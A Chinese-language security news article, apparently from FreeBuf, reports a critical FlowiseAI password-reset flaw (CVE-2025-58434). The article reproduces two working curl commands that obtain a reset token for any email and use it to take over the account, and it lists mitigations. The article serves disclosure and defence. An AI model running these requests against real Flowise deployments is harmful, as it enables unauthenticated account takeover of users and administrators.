漏洞预警:FlowiseAI 高危漏洞(CVE-2025-58434)可导致完全账户接管(CVSS 9.8)
开源生成式AI平台FlowiseAI被发现存在高危漏洞(CVE-2025-58434),CVSS评分为9.8分。该漏洞源于其不安全的密码重置机制,允许攻击者在未认证情况下接管任意账户。修复前需采取临时防护措施以降低风险。 2025-9-14 18:11:32 Author: www.freebuf.com(查看原文) 阅读量:13 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

FlowiseAI账户接管漏洞示意图

开源生成式AI开发平台FlowiseAI(广泛用于构建AI代理和LLM工作流)近日被发现存在高危漏洞,攻击者可在未认证状态下接管云环境和本地部署环境中的任意账户。

漏洞详情

该漏洞编号为CVE-2025-58434,CVSS评分为9.8分,源于平台的密码重置机制。安全公告指出:"Flowise的密码找回端点(/api/v1/account/forgot-password)在未经认证或验证的情况下,直接返回包含有效密码重置临时令牌(tempToken)在内的敏感信息。攻击者可借此为任意用户生成重置令牌并直接修改密码,最终实现完全账户接管(ATO)。"

技术分析

该漏洞端点仅需输入邮箱地址即可触发响应,但API并未通过邮件安全发送重置链接,而是直接返回以下敏感信息:

  • 用户ID、姓名、邮箱及凭证哈希值
  • 账户状态和时间戳
  • 有效的密码重置临时令牌及其有效期

安全公告特别强调:"攻击者获取tempToken后,可立即在/api/v1/account/reset-password端点重复使用,无需邮件验证或用户交互即可重置目标账户密码。"由于仅需获知受害者邮箱(通常可猜测或公开获取),未认证攻击者即可接管包括管理员在内的任意账户。

攻击复现

公告提供了完整的攻击链复现步骤:

  1. 获取重置令牌
curl -i -X POST https://<target>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"[email protected]"}}'

响应报文将包含有效tempToken

  1. 利用令牌重置密码
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{ "user":{ "email":"[email protected]", "tempToken":"<redacted-tempToken>", "password":"NewSecurePassword123!" } }'

当返回200 OK状态码时,受害者密码即被修改

风险影响

该漏洞被归类为"认证绕过/不安全的直接对象引用",具体影响包括:

  • 完全账户接管(含高权限管理员账户)
  • 数据泄露与身份冒用(可访问组织敏感资产)
  • 无需用户交互(大幅降低攻击门槛)
  • 同时影响云环境和本地部署(扩大威胁面)

公告警告称:"由于攻击无需前置条件或用户交互,该漏洞极有可能被大规模利用。"

缓解措施

目前FlowiseAI尚未发布补丁,3.0.5之前的所有版本均受影响。建议采取以下临时防护措施:

  • 禁止API响应返回重置令牌等敏感信息
  • 确保令牌仅通过安全邮件渠道传递
  • 返回通用成功消息以避免用户枚举
  • 实施单次有效、短生命期且绑定请求源的令牌
  • 记录并监控所有密码重置请求
  • 为敏感账户启用多因素认证(MFA)

在官方补丁发布前,管理员需严格实施临时解决方案,限制漏洞端点暴露,并密切监控重置操作。正如公告所述:"该漏洞实质上允许任何未认证攻击者通过请求目标邮箱的重置令牌,接管包括管理员在内的任意账户。"

参考来源:

PoC Available: FlowiseAI Flaw (CVE-2025-58434) Allows Full Account Takeover (CVSS 9.8)

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/ai-security/448621.html
如有侵权请联系:admin#unsafe.sh